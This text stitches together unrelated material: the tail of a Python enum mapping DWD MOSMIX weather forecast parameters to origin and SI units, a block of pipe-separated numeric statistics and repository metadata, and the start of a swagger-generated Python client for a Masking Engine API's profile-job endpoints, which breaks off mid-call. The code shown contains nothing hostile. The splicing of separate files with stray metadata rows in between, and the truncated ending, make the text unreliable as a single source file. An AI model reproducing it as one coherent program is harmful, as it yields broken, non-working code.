        PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_60_PCT_LAST_24H = (
            OriginUnit.PERCENT.value
        )
        PROBABILITY_RADIATION_GLOBAL_LAST_1H = OriginUnit.PERCENT.value
        EVAPOTRANSPIRATION_POTENTIAL_LAST_24H = (
            OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        )
        PROBABILITY_PRECIPITATION_GT_3_0_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_10_0_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_15_0_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_25_0_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_STRAT_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_CONV_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_THUNDERSTORM_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LIQUID_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_FREEZING_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_SOLID_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_DRIZZLE_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_FOG_LAST_24H = OriginUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_25_KN_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_40_KN_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_55_KN_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_STRAT_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_CONV_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_THUNDERSTORM_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LIQUID_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_FREEZING_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_SOLID_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_DRIZZLE_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_6H = OriginUnit.PERCENT.value
        PRECIPITATION_LAST_12H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_CONSIST_LAST_12H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        WEATHER_SIGNIFICANT_LAST_3H = OriginUnit.SIGNIFICANT_WEATHER.value
        PRECIPITATION_LIQUID_CONSIST_LAST_1H = (
            OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        )
        PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_24H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_24H = OriginUnit.PERCENT.value
        PRECIPITATION_LAST_24H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_CONSIST_LAST_24H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        CLOUD_COVER_BELOW_7000_M = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LAST_24H = OriginUnit.PERCENT.value
        CLOUD_BASE_CONVECTIVE = OriginUnit.METER.value
        PROBABILITY_THUNDERSTORM_LAST_24H = OriginUnit.PERCENT.value
        ERROR_ABSOLUTE_PRESSURE_AIR_SURFACE = OriginUnit.PASCAL.value
        SUNSHINE_DURATION_LAST_3H = OriginUnit.SECOND.value
        WEATHER_SIGNIFICANT_OPTIONAL_LAST_1H = OriginUnit.SIGNIFICANT_WEATHER.value
        WEATHER_SIGNIFICANT_OPTIONAL_LAST_3H = OriginUnit.SIGNIFICANT_WEATHER.value
        WEATHER_SIGNIFICANT_OPTIONAL_LAST_6H = OriginUnit.SIGNIFICANT_WEATHER.value
        WEATHER_SIGNIFICANT_OPTIONAL_LAST_12H = OriginUnit.SIGNIFICANT_WEATHER.value
        WEATHER_SIGNIFICANT_OPTIONAL_LAST_24H = OriginUnit.SIGNIFICANT_WEATHER.value
class DwdMosmixUnitSI(DatasetTreeCore):
    """SI (metric) target units for DWD MOSMIX forecast parameters.

    Mirrors ``DwdMosmixUnitOrigin`` member-for-member, but maps each
    parameter to the ``MetricUnit`` it is converted to.  Member order must
    stay in sync with the origin-unit classes — do not reorder.
    """

    class SMALL(UnitEnum):
        """SI units for the MOSMIX-S (small) parameter set."""

        # -- temperatures (Kelvin) --
        TEMPERATURE_AIR_200 = MetricUnit.DEGREE_KELVIN.value
        TEMPERATURE_DEW_POINT_200 = MetricUnit.DEGREE_KELVIN.value
        TEMPERATURE_AIR_MAX_200 = MetricUnit.DEGREE_KELVIN.value
        TEMPERATURE_AIR_MIN_200 = MetricUnit.DEGREE_KELVIN.value
        # -- wind --
        WIND_DIRECTION = MetricUnit.WIND_DIRECTION.value
        WIND_SPEED = MetricUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_1H = MetricUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_3H = MetricUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_12H = MetricUnit.METER_PER_SECOND.value
        # -- precipitation amounts (kg/m^2) --
        PRECIPITATION_CONSIST_LAST_1H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_CONSIST_LAST_3H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_SNOW_EQUIV_LAST_1H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_SNOW_EQUIV_LAST_3H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        # -- weather codes / cloud cover --
        WEATHER_SIGNIFICANT = MetricUnit.SIGNIFICANT_WEATHER.value
        WEATHER_LAST_6H = MetricUnit.DIMENSIONLESS.value
        CLOUD_COVER_TOTAL = MetricUnit.PERCENT.value
        CLOUD_COVER_EFFECTIVE = MetricUnit.PERCENT.value
        CLOUD_COVER_BELOW_500_FT = MetricUnit.PERCENT.value
        CLOUD_COVER_BELOW_1000_FT = MetricUnit.PERCENT.value
        CLOUD_COVER_BETWEEN_2_TO_7_KM = MetricUnit.PERCENT.value
        CLOUD_COVER_ABOVE_7_KM = MetricUnit.PERCENT.value
        # -- surface conditions --
        PRESSURE_AIR_SURFACE_REDUCED = MetricUnit.PASCAL.value
        TEMPERATURE_AIR_005 = MetricUnit.DEGREE_KELVIN.value
        RADIATION_GLOBAL = MetricUnit.GLOBAL_IRRADIANCE.value
        VISIBILITY = MetricUnit.METER.value
        SUNSHINE_DURATION = MetricUnit.SECOND.value
        # -- probabilities (percent) --
        PROBABILITY_WIND_GUST_GE_25_KN_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_40_KN_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_55_KN_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_FOG_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_FOG_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_FOG_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_24H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_24H = MetricUnit.PERCENT.value

    class LARGE(UnitEnum):
        """SI units for the MOSMIX-L (large) parameter set.

        Superset of :class:`SMALL`; note the radiation balances are in
        J/m^2 here (kJ/m^2 at origin).
        """

        # https://opendata.dwd.de/weather/lib/MetElementDefinition.xml
        TEMPERATURE_AIR_200 = MetricUnit.DEGREE_KELVIN.value
        TEMPERATURE_DEW_POINT_200 = MetricUnit.DEGREE_KELVIN.value
        TEMPERATURE_AIR_MAX_200 = MetricUnit.DEGREE_KELVIN.value
        TEMPERATURE_AIR_MIN_200 = MetricUnit.DEGREE_KELVIN.value
        WIND_DIRECTION = MetricUnit.WIND_DIRECTION.value
        WIND_SPEED = MetricUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_1H = MetricUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_3H = MetricUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_12H = MetricUnit.METER_PER_SECOND.value
        PRECIPITATION_CONSIST_LAST_1H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_LAST_1H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_CONSIST_LAST_3H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_LAST_3H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_SNOW_EQUIV_LAST_1H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_SNOW_EQUIV_LAST_3H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        WEATHER_SIGNIFICANT = MetricUnit.SIGNIFICANT_WEATHER.value
        WEATHER_LAST_6H = MetricUnit.DIMENSIONLESS.value
        CLOUD_COVER_TOTAL = MetricUnit.PERCENT.value
        CLOUD_COVER_EFFECTIVE = MetricUnit.PERCENT.value
        CLOUD_COVER_BELOW_500_FT = MetricUnit.PERCENT.value
        CLOUD_COVER_BELOW_1000_FT = MetricUnit.PERCENT.value
        CLOUD_COVER_BETWEEN_2_TO_7_KM = MetricUnit.PERCENT.value
        CLOUD_COVER_ABOVE_7_KM = MetricUnit.PERCENT.value
        PRESSURE_AIR_SURFACE_REDUCED = MetricUnit.PASCAL.value
        TEMPERATURE_AIR_005 = MetricUnit.DEGREE_KELVIN.value
        # J/m^2 here vs kJ/m^2 at origin — the conversion target
        RADIATION_SHORT_WAVE_BALANCE_LAST_3H = MetricUnit.JOULE_PER_SQUARE_METER.value
        RADIATION_GLOBAL = MetricUnit.GLOBAL_IRRADIANCE.value
        RADIATION_LONG_WAVE_BALANCE_LAST_3H = MetricUnit.JOULE_PER_SQUARE_METER.value
        VISIBILITY = MetricUnit.METER.value
        SUNSHINE_DURATION = MetricUnit.SECOND.value
        PROBABILITY_WIND_GUST_GE_25_KN_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_40_KN_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_55_KN_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_FOG_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_FOG_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_FOG_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_24H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_24H = MetricUnit.PERCENT.value
        # -- parameters exclusive to MOSMIX-L --
        TEMPERATURE_AIR_MIN_005_LAST_12H = MetricUnit.DEGREE_KELVIN.value
        TEMPERATURE_AIR_200_LAST_24H = MetricUnit.DEGREE_KELVIN.value
        PRECIPITATION_DURATION = MetricUnit.SECOND.value
        PROBABILITY_DRIZZLE_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_STRAT_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_CONV_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_THUNDERSTORM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LIQUID_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_SOLID_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_FREEZING_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_VISIBILITY_BELOW_1000_M = MetricUnit.PERCENT.value
        # absolute forecast-error estimates, in the unit of the base parameter
        ERROR_ABSOLUTE_TEMPERATURE_AIR_200 = MetricUnit.DEGREE_KELVIN.value
        ERROR_ABSOLUTE_WIND_SPEED = MetricUnit.METER_PER_SECOND.value
        ERROR_ABSOLUTE_WIND_DIRECTION = MetricUnit.WIND_DIRECTION.value
        ERROR_ABSOLUTE_TEMPERATURE_DEW_POINT_200 = MetricUnit.DEGREE_KELVIN.value
        PRECIPITATION_LAST_6H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_CONSIST_LAST_6H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_1_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_3_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_5_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_7_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_2_0_MM_LAST_1H = MetricUnit.PERCENT.value
        SUNSHINE_DURATION_YESTERDAY = MetricUnit.SECOND.value
        SUNSHINE_DURATION_RELATIVE_LAST_24H = MetricUnit.DIMENSIONLESS.value
        PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_0_PCT_LAST_24H = (
            MetricUnit.PERCENT.value
        )
        PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_30_PCT_LAST_24H = (
            MetricUnit.PERCENT.value
        )
        PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_60_PCT_LAST_24H = (
            MetricUnit.PERCENT.value
        )
        PROBABILITY_RADIATION_GLOBAL_LAST_1H = MetricUnit.PERCENT.value
        EVAPOTRANSPIRATION_POTENTIAL_LAST_24H = (
            MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        )
        PROBABILITY_PRECIPITATION_GT_3_0_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_10_0_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_15_0_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_25_0_MM_LAST_1H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_STRAT_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_CONV_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_THUNDERSTORM_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LIQUID_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_FREEZING_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_SOLID_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_DRIZZLE_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_FOG_LAST_24H = MetricUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_25_KN_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_40_KN_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_55_KN_LAST_6H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_STRAT_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_CONV_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_THUNDERSTORM_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LIQUID_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_FREEZING_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_SOLID_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_DRIZZLE_LAST_12H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_6H = MetricUnit.PERCENT.value
        PRECIPITATION_LAST_12H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_CONSIST_LAST_12H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        WEATHER_SIGNIFICANT_LAST_3H = MetricUnit.SIGNIFICANT_WEATHER.value
        PRECIPITATION_LIQUID_CONSIST_LAST_1H = (
            MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        )
        PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_24H = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_24H = MetricUnit.PERCENT.value
        PRECIPITATION_LAST_24H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_CONSIST_LAST_24H = MetricUnit.KILOGRAM_PER_SQUARE_METER.value
        CLOUD_COVER_BELOW_7000_M = MetricUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LAST_24H = MetricUnit.PERCENT.value
        CLOUD_BASE_CONVECTIVE = MetricUnit.METER.value
        PROBABILITY_THUNDERSTORM_LAST_24H = MetricUnit.PERCENT.value
        ERROR_ABSOLUTE_PRESSURE_AIR_SURFACE = MetricUnit.PASCAL.value
        SUNSHINE_DURATION_LAST_3H = MetricUnit.SECOND.value
        WEATHER_SIGNIFICANT_OPTIONAL_LAST_1H = MetricUnit.SIGNIFICANT_WEATHER.value
        WEATHER_SIGNIFICANT_OPTIONAL_LAST_3H = MetricUnit.SIGNIFICANT_WEATHER.value
        WEATHER_SIGNIFICANT_OPTIONAL_LAST_6H = MetricUnit.SIGNIFICANT_WEATHER.value
        WEATHER_SIGNIFICANT_OPTIONAL_LAST_12H = MetricUnit.SIGNIFICANT_WEATHER.value
        WEATHER_SIGNIFICANT_OPTIONAL_LAST_24H = MetricUnit.SIGNIFICANT_WEATHER.value
| 65.692935
| 86
| 0.794333
| 2,929
| 24,175
| 6.021509
| 0.048139
| 0.125191
| 0.185179
| 0.195952
| 0.97579
| 0.955378
| 0.901967
| 0.740829
| 0.67914
| 0.625503
| 0
| 0.032427
| 0.161903
| 24,175
| 367
| 87
| 65.871935
| 0.838063
| 0.010755
| 0
| 0.522472
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005618
| 0
| 0.022472
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e5707293cb93b339006bf3e361c6c50dd225ab2
| 20,480
|
py
|
Python
|
dxm/lib/masking_api/api/profile_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 5
|
2018-08-23T15:47:05.000Z
|
2022-01-19T23:38:18.000Z
|
dxm/lib/masking_api/api/profile_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 59
|
2018-10-15T10:37:00.000Z
|
2022-03-22T20:49:25.000Z
|
dxm/lib/masking_api/api/profile_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 12
|
2019-03-08T19:59:13.000Z
|
2021-12-16T03:28:04.000Z
|
# coding: utf-8
"""
Masking API
Schema for the Masking Engine API # noqa: E501
OpenAPI spec version: 5.1.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dxm.lib.masking_api.api_client import ApiClient
class ProfileJobApi(object):
    """Client for the Masking Engine ``/profile-jobs`` REST endpoints.

    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # Fall back to a default ApiClient so the API class is usable
        # standalone without explicit client configuration.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def create_profile_job(self, body, **kwargs):  # noqa: E501
        """Create profile job  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.create_profile_job(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param ProfileJob body: The profile job to create (required)
        :return: ProfileJob
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # This convenience wrapper always returns only the deserialized
        # payload, never the (data, status, headers) tuple.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_profile_job_with_http_info(body, **kwargs)  # noqa: E501
        else:
            (data) = self.create_profile_job_with_http_info(body, **kwargs)  # noqa: E501
            return data

    def create_profile_job_with_http_info(self, body, **kwargs):  # noqa: E501
        """Create profile job  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.create_profile_job_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param ProfileJob body: The profile job to create (required)
        :return: ProfileJob
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Flatten **kwargs into `params` (a snapshot of locals()) so that
        # unexpected keyword arguments can be rejected explicitly.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_profile_job" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if self.api_client.client_side_validation and ('body' not in params or
                                                       params['body'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `body` when calling `create_profile_job`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/profile-jobs', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ProfileJob',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_profile_job(self, profile_job_id, **kwargs):  # noqa: E501
        """Delete profile job by ID  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.delete_profile_job(profile_job_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int profile_job_id: The ID of the profile job to delete (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Always return the deserialized data only (here: None on success).
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_profile_job_with_http_info(profile_job_id, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_profile_job_with_http_info(profile_job_id, **kwargs)  # noqa: E501
            return data

    def delete_profile_job_with_http_info(self, profile_job_id, **kwargs):  # noqa: E501
        """Delete profile job by ID  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.delete_profile_job_with_http_info(profile_job_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int profile_job_id: The ID of the profile job to delete (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['profile_job_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject keyword arguments this endpoint does not understand.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_profile_job" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'profile_job_id' is set
        if self.api_client.client_side_validation and ('profile_job_id' not in params or
                                                       params['profile_job_id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `profile_job_id` when calling `delete_profile_job`")  # noqa: E501

        collection_formats = {}

        # The job id is substituted into the URL path, not sent as a query.
        path_params = {}
        if 'profile_job_id' in params:
            path_params['profileJobId'] = params['profile_job_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
            '/profile-jobs/{profileJobId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_all_profile_jobs(self, **kwargs):  # noqa: E501
        """Get all profile jobs  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_all_profile_jobs(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int page_number: The page number for which to get profile jobs. This will default to the first page if excluded
        :param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
        :param int environment_id: The ID of the environment to get all profile jobs from
        :return: ProfileJobList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Always return the deserialized ProfileJobList only.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_all_profile_jobs_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_all_profile_jobs_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_all_profile_jobs_with_http_info(self, **kwargs):  # noqa: E501
        """Get all profile jobs  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_all_profile_jobs_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int page_number: The page number for which to get profile jobs. This will default to the first page if excluded
        :param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
        :param int environment_id: The ID of the environment to get all profile jobs from
        :return: ProfileJobList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['page_number', 'page_size', 'environment_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject keyword arguments this endpoint does not understand.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_profile_jobs" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        # Pagination and environment filter are optional query parameters;
        # only forward the ones the caller actually supplied.
        query_params = []
        if 'page_number' in params:
            query_params.append(('page_number', params['page_number']))  # noqa: E501
        if 'page_size' in params:
            query_params.append(('page_size', params['page_size']))  # noqa: E501
        if 'environment_id' in params:
            query_params.append(('environment_id', params['environment_id']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501

        return self.api_client.call_api(
